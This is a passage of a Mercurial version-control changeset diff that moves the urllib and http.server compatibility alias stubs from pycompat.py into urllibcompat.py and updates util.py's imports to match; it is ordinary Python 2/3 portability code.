##// END OF EJS Templates
urllibcompat: move some adapters from pycompat to urllibcompat...
Augie Fackler -
r34468:192f7b12 default
parent child Browse files
Show More
@@ -1,463 +1,316 b''
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import os
15 15 import shlex
16 16 import sys
17 17
18 18 ispy3 = (sys.version_info[0] >= 3)
19 19 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 20
21 21 if not ispy3:
22 22 import cookielib
23 23 import cPickle as pickle
24 24 import httplib
25 25 import Queue as _queue
26 26 import SocketServer as socketserver
27 27 import xmlrpclib
28 28 else:
29 29 import http.cookiejar as cookielib
30 30 import http.client as httplib
31 31 import pickle
32 32 import queue as _queue
33 33 import socketserver
34 34 import xmlrpc.client as xmlrpclib
35 35
36 36 empty = _queue.Empty
37 37 queue = _queue.Queue
38 38
39 39 def identity(a):
40 40 return a
41 41
42 42 if ispy3:
43 43 import builtins
44 44 import functools
45 45 import io
46 46 import struct
47 47
48 48 fsencode = os.fsencode
49 49 fsdecode = os.fsdecode
50 50 oslinesep = os.linesep.encode('ascii')
51 51 osname = os.name.encode('ascii')
52 52 ospathsep = os.pathsep.encode('ascii')
53 53 ossep = os.sep.encode('ascii')
54 54 osaltsep = os.altsep
55 55 if osaltsep:
56 56 osaltsep = osaltsep.encode('ascii')
57 57 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
58 58 # returns bytes.
59 59 getcwd = os.getcwdb
60 60 sysplatform = sys.platform.encode('ascii')
61 61 sysexecutable = sys.executable
62 62 if sysexecutable:
63 63 sysexecutable = os.fsencode(sysexecutable)
64 64 stringio = io.BytesIO
65 65 maplist = lambda *args: list(map(*args))
66 66 rawinput = input
67 67
68 68 # TODO: .buffer might not exist if std streams were replaced; we'll need
69 69 # a silly wrapper to make a bytes stream backed by a unicode one.
70 70 stdin = sys.stdin.buffer
71 71 stdout = sys.stdout.buffer
72 72 stderr = sys.stderr.buffer
73 73
74 74 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
75 75 # we can use os.fsencode() to get back bytes argv.
76 76 #
77 77 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
78 78 #
79 79 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
80 80 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
81 81 if getattr(sys, 'argv', None) is not None:
82 82 sysargv = list(map(os.fsencode, sys.argv))
83 83
84 84 bytechr = struct.Struct('>B').pack
85 85
86 86 class bytestr(bytes):
87 87 """A bytes which mostly acts as a Python 2 str
88 88
89 89 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
90 90 (b'', b'foo', b'ascii', b'1')
91 91 >>> s = bytestr(b'foo')
92 92 >>> assert s is bytestr(s)
93 93
94 94 __bytes__() should be called if provided:
95 95
96 96 >>> class bytesable(object):
97 97 ... def __bytes__(self):
98 98 ... return b'bytes'
99 99 >>> bytestr(bytesable())
100 100 b'bytes'
101 101
102 102 There's no implicit conversion from non-ascii str as its encoding is
103 103 unknown:
104 104
105 105 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
106 106 Traceback (most recent call last):
107 107 ...
108 108 UnicodeEncodeError: ...
109 109
110 110 Comparison between bytestr and bytes should work:
111 111
112 112 >>> assert bytestr(b'foo') == b'foo'
113 113 >>> assert b'foo' == bytestr(b'foo')
114 114 >>> assert b'f' in bytestr(b'foo')
115 115 >>> assert bytestr(b'f') in b'foo'
116 116
117 117 Sliced elements should be bytes, not integer:
118 118
119 119 >>> s[1], s[:2]
120 120 (b'o', b'fo')
121 121 >>> list(s), list(reversed(s))
122 122 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
123 123
124 124 As bytestr type isn't propagated across operations, you need to cast
125 125 bytes to bytestr explicitly:
126 126
127 127 >>> s = bytestr(b'foo').upper()
128 128 >>> t = bytestr(s)
129 129 >>> s[0], t[0]
130 130 (70, b'F')
131 131
132 132 Be careful to not pass a bytestr object to a function which expects
133 133 bytearray-like behavior.
134 134
135 135 >>> t = bytes(t) # cast to bytes
136 136 >>> assert type(t) is bytes
137 137 """
138 138
139 139 def __new__(cls, s=b''):
140 140 if isinstance(s, bytestr):
141 141 return s
142 142 if (not isinstance(s, (bytes, bytearray))
143 143 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
144 144 s = str(s).encode(u'ascii')
145 145 return bytes.__new__(cls, s)
146 146
147 147 def __getitem__(self, key):
148 148 s = bytes.__getitem__(self, key)
149 149 if not isinstance(s, bytes):
150 150 s = bytechr(s)
151 151 return s
152 152
153 153 def __iter__(self):
154 154 return iterbytestr(bytes.__iter__(self))
155 155
156 156 def iterbytestr(s):
157 157 """Iterate bytes as if it were a str object of Python 2"""
158 158 return map(bytechr, s)
159 159
160 160 def sysbytes(s):
161 161 """Convert an internal str (e.g. keyword, __doc__) back to bytes
162 162
163 163 This never raises UnicodeEncodeError, but only ASCII characters
164 164 can be round-trip by sysstr(sysbytes(s)).
165 165 """
166 166 return s.encode(u'utf-8')
167 167
168 168 def sysstr(s):
169 169 """Return a keyword str to be passed to Python functions such as
170 170 getattr() and str.encode()
171 171
172 172 This never raises UnicodeDecodeError. Non-ascii characters are
173 173 considered invalid and mapped to arbitrary but unique code points
174 174 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
175 175 """
176 176 if isinstance(s, builtins.str):
177 177 return s
178 178 return s.decode(u'latin-1')
179 179
180 180 def strurl(url):
181 181 """Converts a bytes url back to str"""
182 182 return url.decode(u'ascii')
183 183
184 184 def bytesurl(url):
185 185 """Converts a str url to bytes by encoding in ascii"""
186 186 return url.encode(u'ascii')
187 187
188 188 def raisewithtb(exc, tb):
189 189 """Raise exception with the given traceback"""
190 190 raise exc.with_traceback(tb)
191 191
192 192 def getdoc(obj):
193 193 """Get docstring as bytes; may be None so gettext() won't confuse it
194 194 with _('')"""
195 195 doc = getattr(obj, u'__doc__', None)
196 196 if doc is None:
197 197 return doc
198 198 return sysbytes(doc)
199 199
200 200 def _wrapattrfunc(f):
201 201 @functools.wraps(f)
202 202 def w(object, name, *args):
203 203 return f(object, sysstr(name), *args)
204 204 return w
205 205
206 206 # these wrappers are automagically imported by hgloader
207 207 delattr = _wrapattrfunc(builtins.delattr)
208 208 getattr = _wrapattrfunc(builtins.getattr)
209 209 hasattr = _wrapattrfunc(builtins.hasattr)
210 210 setattr = _wrapattrfunc(builtins.setattr)
211 211 xrange = builtins.range
212 212 unicode = str
213 213
214 214 def open(name, mode='r', buffering=-1):
215 215 return builtins.open(name, sysstr(mode), buffering)
216 216
217 217 def getoptb(args, shortlist, namelist):
218 218 """
219 219 Takes bytes arguments, converts them to unicode, pass them to
220 220 getopt.getopt(), convert the returned values back to bytes and then
221 221 return them for Python 3 compatibility as getopt.getopt() don't accepts
222 222 bytes on Python 3.
223 223 """
224 224 args = [a.decode('latin-1') for a in args]
225 225 shortlist = shortlist.decode('latin-1')
226 226 namelist = [a.decode('latin-1') for a in namelist]
227 227 opts, args = getopt.getopt(args, shortlist, namelist)
228 228 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
229 229 for a in opts]
230 230 args = [a.encode('latin-1') for a in args]
231 231 return opts, args
232 232
233 233 def strkwargs(dic):
234 234 """
235 235 Converts the keys of a python dictonary to str i.e. unicodes so that
236 236 they can be passed as keyword arguments as dictonaries with bytes keys
237 237 can't be passed as keyword arguments to functions on Python 3.
238 238 """
239 239 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
240 240 return dic
241 241
242 242 def byteskwargs(dic):
243 243 """
244 244 Converts keys of python dictonaries to bytes as they were converted to
245 245 str to pass that dictonary as a keyword argument on Python 3.
246 246 """
247 247 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
248 248 return dic
249 249
250 250 # TODO: handle shlex.shlex().
251 251 def shlexsplit(s):
252 252 """
253 253 Takes bytes argument, convert it to str i.e. unicodes, pass that into
254 254 shlex.split(), convert the returned value to bytes and return that for
255 255 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
256 256 """
257 257 ret = shlex.split(s.decode('latin-1'))
258 258 return [a.encode('latin-1') for a in ret]
259 259
260 260 else:
261 261 import cStringIO
262 262
263 263 bytechr = chr
264 264 bytestr = str
265 265 iterbytestr = iter
266 266 sysbytes = identity
267 267 sysstr = identity
268 268 strurl = identity
269 269 bytesurl = identity
270 270
271 271 # this can't be parsed on Python 3
272 272 exec('def raisewithtb(exc, tb):\n'
273 273 ' raise exc, None, tb\n')
274 274
275 275 def fsencode(filename):
276 276 """
277 277 Partial backport from os.py in Python 3, which only accepts bytes.
278 278 In Python 2, our paths should only ever be bytes, a unicode path
279 279 indicates a bug.
280 280 """
281 281 if isinstance(filename, str):
282 282 return filename
283 283 else:
284 284 raise TypeError(
285 285 "expect str, not %s" % type(filename).__name__)
286 286
287 287 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
288 288 # better not to touch Python 2 part as it's already working fine.
289 289 fsdecode = identity
290 290
291 291 def getdoc(obj):
292 292 return getattr(obj, '__doc__', None)
293 293
294 294 def getoptb(args, shortlist, namelist):
295 295 return getopt.getopt(args, shortlist, namelist)
296 296
297 297 strkwargs = identity
298 298 byteskwargs = identity
299 299
300 300 oslinesep = os.linesep
301 301 osname = os.name
302 302 ospathsep = os.pathsep
303 303 ossep = os.sep
304 304 osaltsep = os.altsep
305 305 stdin = sys.stdin
306 306 stdout = sys.stdout
307 307 stderr = sys.stderr
308 308 if getattr(sys, 'argv', None) is not None:
309 309 sysargv = sys.argv
310 310 sysplatform = sys.platform
311 311 getcwd = os.getcwd
312 312 sysexecutable = sys.executable
313 313 shlexsplit = shlex.split
314 314 stringio = cStringIO.StringIO
315 315 maplist = map
316 316 rawinput = raw_input
317
318 class _pycompatstub(object):
319 def __init__(self):
320 self._aliases = {}
321
322 def _registeraliases(self, origin, items):
323 """Add items that will be populated at the first access"""
324 items = map(sysstr, items)
325 self._aliases.update(
326 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
327 for item in items)
328
329 def _registeralias(self, origin, attr, name):
330 """Alias ``origin``.``attr`` as ``name``"""
331 self._aliases[sysstr(name)] = (origin, sysstr(attr))
332
333 def __getattr__(self, name):
334 try:
335 origin, item = self._aliases[name]
336 except KeyError:
337 raise AttributeError(name)
338 self.__dict__[name] = obj = getattr(origin, item)
339 return obj
340
341 httpserver = _pycompatstub()
342 urlreq = _pycompatstub()
343 urlerr = _pycompatstub()
344 if not ispy3:
345 import BaseHTTPServer
346 import CGIHTTPServer
347 import SimpleHTTPServer
348 import urllib2
349 import urllib
350 import urlparse
351 urlreq._registeraliases(urllib, (
352 "addclosehook",
353 "addinfourl",
354 "ftpwrapper",
355 "pathname2url",
356 "quote",
357 "splitattr",
358 "splitpasswd",
359 "splitport",
360 "splituser",
361 "unquote",
362 "url2pathname",
363 "urlencode",
364 ))
365 urlreq._registeraliases(urllib2, (
366 "AbstractHTTPHandler",
367 "BaseHandler",
368 "build_opener",
369 "FileHandler",
370 "FTPHandler",
371 "HTTPBasicAuthHandler",
372 "HTTPDigestAuthHandler",
373 "HTTPHandler",
374 "HTTPPasswordMgrWithDefaultRealm",
375 "HTTPSHandler",
376 "install_opener",
377 "ProxyHandler",
378 "Request",
379 "urlopen",
380 ))
381 urlreq._registeraliases(urlparse, (
382 "urlparse",
383 "urlunparse",
384 ))
385 urlerr._registeraliases(urllib2, (
386 "HTTPError",
387 "URLError",
388 ))
389 httpserver._registeraliases(BaseHTTPServer, (
390 "HTTPServer",
391 "BaseHTTPRequestHandler",
392 ))
393 httpserver._registeraliases(SimpleHTTPServer, (
394 "SimpleHTTPRequestHandler",
395 ))
396 httpserver._registeraliases(CGIHTTPServer, (
397 "CGIHTTPRequestHandler",
398 ))
399
400 else:
401 import urllib.parse
402 urlreq._registeraliases(urllib.parse, (
403 "splitattr",
404 "splitpasswd",
405 "splitport",
406 "splituser",
407 "urlparse",
408 "urlunparse",
409 ))
410 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
411 import urllib.request
412 urlreq._registeraliases(urllib.request, (
413 "AbstractHTTPHandler",
414 "BaseHandler",
415 "build_opener",
416 "FileHandler",
417 "FTPHandler",
418 "ftpwrapper",
419 "HTTPHandler",
420 "HTTPSHandler",
421 "install_opener",
422 "pathname2url",
423 "HTTPBasicAuthHandler",
424 "HTTPDigestAuthHandler",
425 "HTTPPasswordMgrWithDefaultRealm",
426 "ProxyHandler",
427 "Request",
428 "url2pathname",
429 "urlopen",
430 ))
431 import urllib.response
432 urlreq._registeraliases(urllib.response, (
433 "addclosehook",
434 "addinfourl",
435 ))
436 import urllib.error
437 urlerr._registeraliases(urllib.error, (
438 "HTTPError",
439 "URLError",
440 ))
441 import http.server
442 httpserver._registeraliases(http.server, (
443 "HTTPServer",
444 "BaseHTTPRequestHandler",
445 "SimpleHTTPRequestHandler",
446 "CGIHTTPRequestHandler",
447 ))
448
449 # urllib.parse.quote() accepts both str and bytes, decodes bytes
450 # (if necessary), and returns str. This is wonky. We provide a custom
451 # implementation that only accepts bytes and emits bytes.
452 def quote(s, safe=r'/'):
453 s = urllib.parse.quote_from_bytes(s, safe=safe)
454 return s.encode('ascii', 'strict')
455
456 # urllib.parse.urlencode() returns str. We use this function to make
457 # sure we return bytes.
458 def urlencode(query, doseq=False):
459 s = urllib.parse.urlencode(query, doseq=doseq)
460 return s.encode('ascii')
461
462 urlreq.quote = quote
463 urlreq.urlencode = urlencode
@@ -1,42 +1,188 b''
1 1 # urllibcompat.py - adapters to ease using urllib2 on Py2 and urllib on Py3
2 2 #
3 3 # Copyright 2017 Google, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 from __future__ import absolute_import
8 8
9 9 from . import pycompat
10 10
11 _sysstr = pycompat.sysstr
12
13 class _pycompatstub(object):
14 def __init__(self):
15 self._aliases = {}
16
17 def _registeraliases(self, origin, items):
18 """Add items that will be populated at the first access"""
19 items = map(_sysstr, items)
20 self._aliases.update(
21 (item.replace(_sysstr('_'), _sysstr('')).lower(), (origin, item))
22 for item in items)
23
24 def _registeralias(self, origin, attr, name):
25 """Alias ``origin``.``attr`` as ``name``"""
26 self._aliases[_sysstr(name)] = (origin, _sysstr(attr))
27
28 def __getattr__(self, name):
29 try:
30 origin, item = self._aliases[name]
31 except KeyError:
32 raise AttributeError(name)
33 self.__dict__[name] = obj = getattr(origin, item)
34 return obj
35
36 httpserver = _pycompatstub()
37 urlreq = _pycompatstub()
38 urlerr = _pycompatstub()
39
11 40 if pycompat.ispy3:
41 import urllib.parse
42 urlreq._registeraliases(urllib.parse, (
43 "splitattr",
44 "splitpasswd",
45 "splitport",
46 "splituser",
47 "urlparse",
48 "urlunparse",
49 ))
50 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
51 import urllib.request
52 urlreq._registeraliases(urllib.request, (
53 "AbstractHTTPHandler",
54 "BaseHandler",
55 "build_opener",
56 "FileHandler",
57 "FTPHandler",
58 "ftpwrapper",
59 "HTTPHandler",
60 "HTTPSHandler",
61 "install_opener",
62 "pathname2url",
63 "HTTPBasicAuthHandler",
64 "HTTPDigestAuthHandler",
65 "HTTPPasswordMgrWithDefaultRealm",
66 "ProxyHandler",
67 "Request",
68 "url2pathname",
69 "urlopen",
70 ))
71 import urllib.response
72 urlreq._registeraliases(urllib.response, (
73 "addclosehook",
74 "addinfourl",
75 ))
76 import urllib.error
77 urlerr._registeraliases(urllib.error, (
78 "HTTPError",
79 "URLError",
80 ))
81 import http.server
82 httpserver._registeraliases(http.server, (
83 "HTTPServer",
84 "BaseHTTPRequestHandler",
85 "SimpleHTTPRequestHandler",
86 "CGIHTTPRequestHandler",
87 ))
88
89 # urllib.parse.quote() accepts both str and bytes, decodes bytes
90 # (if necessary), and returns str. This is wonky. We provide a custom
91 # implementation that only accepts bytes and emits bytes.
92 def quote(s, safe=r'/'):
93 s = urllib.parse.quote_from_bytes(s, safe=safe)
94 return s.encode('ascii', 'strict')
95
96 # urllib.parse.urlencode() returns str. We use this function to make
97 # sure we return bytes.
98 def urlencode(query, doseq=False):
99 s = urllib.parse.urlencode(query, doseq=doseq)
100 return s.encode('ascii')
101
102 urlreq.quote = quote
103 urlreq.urlencode = urlencode
12 104
13 105 def getfullurl(req):
14 106 return req.full_url
15 107
16 108 def gethost(req):
17 109 return req.host
18 110
19 111 def getselector(req):
20 112 return req.selector
21 113
22 114 def getdata(req):
23 115 return req.data
24 116
25 117 def hasdata(req):
26 118 return req.data is not None
27 119 else:
120 import BaseHTTPServer
121 import CGIHTTPServer
122 import SimpleHTTPServer
123 import urllib2
124 import urllib
125 import urlparse
126 urlreq._registeraliases(urllib, (
127 "addclosehook",
128 "addinfourl",
129 "ftpwrapper",
130 "pathname2url",
131 "quote",
132 "splitattr",
133 "splitpasswd",
134 "splitport",
135 "splituser",
136 "unquote",
137 "url2pathname",
138 "urlencode",
139 ))
140 urlreq._registeraliases(urllib2, (
141 "AbstractHTTPHandler",
142 "BaseHandler",
143 "build_opener",
144 "FileHandler",
145 "FTPHandler",
146 "HTTPBasicAuthHandler",
147 "HTTPDigestAuthHandler",
148 "HTTPHandler",
149 "HTTPPasswordMgrWithDefaultRealm",
150 "HTTPSHandler",
151 "install_opener",
152 "ProxyHandler",
153 "Request",
154 "urlopen",
155 ))
156 urlreq._registeraliases(urlparse, (
157 "urlparse",
158 "urlunparse",
159 ))
160 urlerr._registeraliases(urllib2, (
161 "HTTPError",
162 "URLError",
163 ))
164 httpserver._registeraliases(BaseHTTPServer, (
165 "HTTPServer",
166 "BaseHTTPRequestHandler",
167 ))
168 httpserver._registeraliases(SimpleHTTPServer, (
169 "SimpleHTTPRequestHandler",
170 ))
171 httpserver._registeraliases(CGIHTTPServer, (
172 "CGIHTTPRequestHandler",
173 ))
28 174
29 175 def gethost(req):
30 176 return req.get_host()
31 177
32 178 def getselector(req):
33 179 return req.get_selector()
34 180
35 181 def getfullurl(req):
36 182 return req.get_full_url()
37 183
38 184 def getdata(req):
39 185 return req.get_data()
40 186
41 187 def hasdata(req):
42 188 return req.has_data()
@@ -1,3835 +1,3837 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 urllibcompat,
53 54 )
54 55
55 56 base85 = policy.importmod(r'base85')
56 57 osutil = policy.importmod(r'osutil')
57 58 parsers = policy.importmod(r'parsers')
58 59
59 60 b85decode = base85.b85decode
60 61 b85encode = base85.b85encode
61 62
62 63 cookielib = pycompat.cookielib
63 64 empty = pycompat.empty
64 65 httplib = pycompat.httplib
65 httpserver = pycompat.httpserver
66 66 pickle = pycompat.pickle
67 67 queue = pycompat.queue
68 68 socketserver = pycompat.socketserver
69 69 stderr = pycompat.stderr
70 70 stdin = pycompat.stdin
71 71 stdout = pycompat.stdout
72 72 stringio = pycompat.stringio
73 urlerr = pycompat.urlerr
74 urlreq = pycompat.urlreq
75 73 xmlrpclib = pycompat.xmlrpclib
76 74
75 httpserver = urllibcompat.httpserver
76 urlerr = urllibcompat.urlerr
77 urlreq = urllibcompat.urlreq
78
77 79 # workaround for win32mbcs
78 80 _filenamebytestr = pycompat.bytestr
79 81
80 82 def isatty(fp):
81 83 try:
82 84 return fp.isatty()
83 85 except AttributeError:
84 86 return False
85 87
86 88 # glibc determines buffering on first write to stdout - if we replace a TTY
87 89 # destined stdout with a pipe destined stdout (e.g. pager), we want line
88 90 # buffering
89 91 if isatty(stdout):
90 92 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
91 93
92 94 if pycompat.osname == 'nt':
93 95 from . import windows as platform
94 96 stdout = platform.winstdout(stdout)
95 97 else:
96 98 from . import posix as platform
97 99
98 100 _ = i18n._
99 101
100 102 bindunixsocket = platform.bindunixsocket
101 103 cachestat = platform.cachestat
102 104 checkexec = platform.checkexec
103 105 checklink = platform.checklink
104 106 copymode = platform.copymode
105 107 executablepath = platform.executablepath
106 108 expandglobs = platform.expandglobs
107 109 explainexit = platform.explainexit
108 110 findexe = platform.findexe
109 111 gethgcmd = platform.gethgcmd
110 112 getuser = platform.getuser
111 113 getpid = os.getpid
112 114 groupmembers = platform.groupmembers
113 115 groupname = platform.groupname
114 116 hidewindow = platform.hidewindow
115 117 isexec = platform.isexec
116 118 isowner = platform.isowner
117 119 listdir = osutil.listdir
118 120 localpath = platform.localpath
119 121 lookupreg = platform.lookupreg
120 122 makedir = platform.makedir
121 123 nlinks = platform.nlinks
122 124 normpath = platform.normpath
123 125 normcase = platform.normcase
124 126 normcasespec = platform.normcasespec
125 127 normcasefallback = platform.normcasefallback
126 128 openhardlinks = platform.openhardlinks
127 129 oslink = platform.oslink
128 130 parsepatchoutput = platform.parsepatchoutput
129 131 pconvert = platform.pconvert
130 132 poll = platform.poll
131 133 popen = platform.popen
132 134 posixfile = platform.posixfile
133 135 quotecommand = platform.quotecommand
134 136 readpipe = platform.readpipe
135 137 rename = platform.rename
136 138 removedirs = platform.removedirs
137 139 samedevice = platform.samedevice
138 140 samefile = platform.samefile
139 141 samestat = platform.samestat
140 142 setbinary = platform.setbinary
141 143 setflags = platform.setflags
142 144 setsignalhandler = platform.setsignalhandler
143 145 shellquote = platform.shellquote
144 146 spawndetached = platform.spawndetached
145 147 split = platform.split
146 148 sshargs = platform.sshargs
147 149 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
148 150 statisexec = platform.statisexec
149 151 statislink = platform.statislink
150 152 testpid = platform.testpid
151 153 umask = platform.umask
152 154 unlink = platform.unlink
153 155 username = platform.username
154 156
155 157 try:
156 158 recvfds = osutil.recvfds
157 159 except AttributeError:
158 160 pass
159 161 try:
160 162 setprocname = osutil.setprocname
161 163 except AttributeError:
162 164 pass
163 165
164 166 # Python compatibility
165 167
166 168 _notset = object()
167 169
168 170 # disable Python's problematic floating point timestamps (issue4836)
169 171 # (Python hypocritically says you shouldn't change this behavior in
170 172 # libraries, and sure enough Mercurial is not a library.)
171 173 os.stat_float_times(False)
172 174
173 175 def safehasattr(thing, attr):
174 176 return getattr(thing, attr, _notset) is not _notset
175 177
176 178 def bytesinput(fin, fout, *args, **kwargs):
177 179 sin, sout = sys.stdin, sys.stdout
178 180 try:
179 181 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
180 182 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
181 183 finally:
182 184 sys.stdin, sys.stdout = sin, sout
183 185
184 186 def bitsfrom(container):
185 187 bits = 0
186 188 for bit in container:
187 189 bits |= bit
188 190 return bits
189 191
190 192 # python 2.6 still have deprecation warning enabled by default. We do not want
191 193 # to display anything to standard user so detect if we are running test and
192 194 # only use python deprecation warning in this case.
193 195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
194 196 if _dowarn:
195 197 # explicitly unfilter our warning for python 2.7
196 198 #
197 199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
198 200 # However, module name set through PYTHONWARNINGS was exactly matched, so
199 201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
200 202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
201 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
202 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
203 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
204 206
205 207 def nouideprecwarn(msg, version, stacklevel=1):
206 208 """Issue an python native deprecation warning
207 209
208 210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
209 211 """
210 212 if _dowarn:
211 213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
212 214 " update your code.)") % version
213 215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
214 216
215 217 DIGESTS = {
216 218 'md5': hashlib.md5,
217 219 'sha1': hashlib.sha1,
218 220 'sha512': hashlib.sha512,
219 221 }
220 222 # List of digest types from strongest to weakest
221 223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
222 224
223 225 for k in DIGESTS_BY_STRENGTH:
224 226 assert k in DIGESTS
225 227
226 228 class digester(object):
227 229 """helper to compute digests.
228 230
229 231 This helper can be used to compute one or more digests given their name.
230 232
231 233 >>> d = digester([b'md5', b'sha1'])
232 234 >>> d.update(b'foo')
233 235 >>> [k for k in sorted(d)]
234 236 ['md5', 'sha1']
235 237 >>> d[b'md5']
236 238 'acbd18db4cc2f85cedef654fccc4a4d8'
237 239 >>> d[b'sha1']
238 240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
239 241 >>> digester.preferred([b'md5', b'sha1'])
240 242 'sha1'
241 243 """
242 244
243 245 def __init__(self, digests, s=''):
244 246 self._hashes = {}
245 247 for k in digests:
246 248 if k not in DIGESTS:
247 249 raise Abort(_('unknown digest type: %s') % k)
248 250 self._hashes[k] = DIGESTS[k]()
249 251 if s:
250 252 self.update(s)
251 253
252 254 def update(self, data):
253 255 for h in self._hashes.values():
254 256 h.update(data)
255 257
256 258 def __getitem__(self, key):
257 259 if key not in DIGESTS:
258 260 raise Abort(_('unknown digest type: %s') % k)
259 261 return self._hashes[key].hexdigest()
260 262
261 263 def __iter__(self):
262 264 return iter(self._hashes)
263 265
264 266 @staticmethod
265 267 def preferred(supported):
266 268 """returns the strongest digest type in both supported and DIGESTS."""
267 269
268 270 for k in DIGESTS_BY_STRENGTH:
269 271 if k in supported:
270 272 return k
271 273 return None
272 274
273 275 class digestchecker(object):
274 276 """file handle wrapper that additionally checks content against a given
275 277 size and digests.
276 278
277 279 d = digestchecker(fh, size, {'md5': '...'})
278 280
279 281 When multiple digests are given, all of them are validated.
280 282 """
281 283
282 284 def __init__(self, fh, size, digests):
283 285 self._fh = fh
284 286 self._size = size
285 287 self._got = 0
286 288 self._digests = dict(digests)
287 289 self._digester = digester(self._digests.keys())
288 290
289 291 def read(self, length=-1):
290 292 content = self._fh.read(length)
291 293 self._digester.update(content)
292 294 self._got += len(content)
293 295 return content
294 296
295 297 def validate(self):
296 298 if self._size != self._got:
297 299 raise Abort(_('size mismatch: expected %d, got %d') %
298 300 (self._size, self._got))
299 301 for k, v in self._digests.items():
300 302 if v != self._digester[k]:
301 303 # i18n: first parameter is a digest name
302 304 raise Abort(_('%s mismatch: expected %s, got %s') %
303 305 (k, v, self._digester[k]))
304 306
305 307 try:
306 308 buffer = buffer
307 309 except NameError:
308 310 def buffer(sliceable, offset=0, length=None):
309 311 if length is not None:
310 312 return memoryview(sliceable)[offset:offset + length]
311 313 return memoryview(sliceable)[offset:]
312 314
313 315 closefds = pycompat.osname == 'posix'
314 316
315 317 _chunksize = 4096
316 318
317 319 class bufferedinputpipe(object):
318 320 """a manually buffered input pipe
319 321
320 322 Python will not let us use buffered IO and lazy reading with 'polling' at
321 323 the same time. We cannot probe the buffer state and select will not detect
322 324 that data are ready to read if they are already buffered.
323 325
324 326 This class let us work around that by implementing its own buffering
325 327 (allowing efficient readline) while offering a way to know if the buffer is
326 328 empty from the output (allowing collaboration of the buffer with polling).
327 329
328 330 This class lives in the 'util' module because it makes use of the 'os'
329 331 module from the python stdlib.
330 332 """
331 333
332 334 def __init__(self, input):
333 335 self._input = input
334 336 self._buffer = []
335 337 self._eof = False
336 338 self._lenbuf = 0
337 339
338 340 @property
339 341 def hasbuffer(self):
340 342 """True is any data is currently buffered
341 343
342 344 This will be used externally a pre-step for polling IO. If there is
343 345 already data then no polling should be set in place."""
344 346 return bool(self._buffer)
345 347
346 348 @property
347 349 def closed(self):
348 350 return self._input.closed
349 351
350 352 def fileno(self):
351 353 return self._input.fileno()
352 354
353 355 def close(self):
354 356 return self._input.close()
355 357
356 358 def read(self, size):
357 359 while (not self._eof) and (self._lenbuf < size):
358 360 self._fillbuffer()
359 361 return self._frombuffer(size)
360 362
361 363 def readline(self, *args, **kwargs):
362 364 if 1 < len(self._buffer):
363 365 # this should not happen because both read and readline end with a
364 366 # _frombuffer call that collapse it.
365 367 self._buffer = [''.join(self._buffer)]
366 368 self._lenbuf = len(self._buffer[0])
367 369 lfi = -1
368 370 if self._buffer:
369 371 lfi = self._buffer[-1].find('\n')
370 372 while (not self._eof) and lfi < 0:
371 373 self._fillbuffer()
372 374 if self._buffer:
373 375 lfi = self._buffer[-1].find('\n')
374 376 size = lfi + 1
